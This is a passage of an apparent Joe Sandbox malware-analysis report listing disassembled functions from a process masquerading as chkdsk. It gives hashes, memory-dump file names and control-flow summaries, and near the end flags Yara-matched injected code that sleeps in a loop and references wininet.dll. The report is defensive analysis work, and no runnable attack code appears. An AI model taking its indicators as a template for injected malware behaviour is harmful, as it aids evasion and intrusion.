                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023907AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0238FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9030 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 298 a9030-a905f 299 a906b-a9072 298->299 300 a9066 call abe60 298->300 301 a9078-a90c8 call abf30 call 9a140 call a5aa0 299->301 302 a914c-a9152 299->302 300->299 309 a90d0-a90e1 Sleep 301->309 310 a90e3-a90e9 309->310 311 a9146-a914a 309->311 312 a90eb-a9111 call a8c60 310->312 313 a9113-a9133 310->313 311->302 311->309 315 a9139-a913c 312->315 313->315 316 a9134 call a8e60 313->316 315->311 316->315
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 65abd6905f0a6074de93a76dc4fc1a183c9c81f992fa436b8981f6c79ac22bdb
                                          • Instruction ID: fb4008a0d6f50c086933b7b200a8f882fdb7408527c75eccbe65bab7abfe4472
                                          • Opcode Fuzzy Hash: 65abd6905f0a6074de93a76dc4fc1a183c9c81f992fa436b8981f6c79ac22bdb
                                          • Instruction Fuzzy Hash: C3316EB2602605ABD721DFA4C8A1FA7B7F8AF89700F10811DF61A5B242D770B545CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9029 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 318 a9029-a9072 call abe60 321 a9078-a90c8 call abf30 call 9a140 call a5aa0 318->321 322 a914c-a9152 318->322 329 a90d0-a90e1 Sleep 321->329 330 a90e3-a90e9 329->330 331 a9146-a914a 329->331 332 a90eb-a9111 call a8c60 330->332 333 a9113-a9133 330->333 331->322 331->329 335 a9139-a913c 332->335 333->335 336 a9134 call a8e60 333->336 335->331 336->335
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 3c0df432608fc6fe9f1275814f97c95b21b706d27a0d5be1d80734afebe50bcb
                                          • Instruction ID: af507350fc16d4c981d656046ea1b24eb9821138d7a5e52d559d44f6dc54870c
                                          • Opcode Fuzzy Hash: 3c0df432608fc6fe9f1275814f97c95b21b706d27a0d5be1d80734afebe50bcb
                                          • Instruction Fuzzy Hash: D1217EB1A01705ABD711DFA4C8E5FABB7F4AF99700F108129F6199B242D770A855CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00097679 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 338 97679-976ca call abf80 call acb60 call 9a140 call a5aa0 347 976cc-976de PostThreadMessageW 338->347 348 976fe-97702 338->348 349 976fd 347->349 350 976e0-976fb call 998a0 PostThreadMessageW 347->350 349->348 350->349
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 000976DA
                                          • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 000976FB
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 09a693ab53f5b77bfa46604cbe96ab275ae47f1b3c9725a3eef587ad564fd1d8
                                          • Instruction ID: 9c2c899b0050746a3ad00cce5bd97d4c7e26555bae171f51c93a3c1a4d0d86fb
